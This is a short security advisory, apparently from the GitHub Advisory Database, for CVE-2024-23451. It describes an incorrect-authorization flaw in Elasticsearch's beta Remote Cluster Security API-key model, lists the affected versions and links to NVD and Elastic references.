Incorrect Authorization issue exists in the API key based security model for Remote Cluster Security, which is currently in Beta, in Elasticsearch 8.10.0 and before 8.13.0. This allows a malicious user with a valid API key for a remote cluster configured to use the new Remote Cluster Security to read arbitrary documents from any index on the remote cluster, and only if they use the Elasticsearch custom transport protocol to issue requests with the target index ID, the shard ID and the document ID. None of Elasticsearch REST API endpoints are affected by this issue.

**References**

*   https://nvd.nist.gov/vuln/detail/CVE-2024-23451
*   https://discuss.elastic.co/t/elasticsearch-8-13-0-security-update-esa-2024-07/356315

Published to the GitHub Advisory Database

Mar 27, 2024

Last updated

Mar 27, 2024

Tag

#auth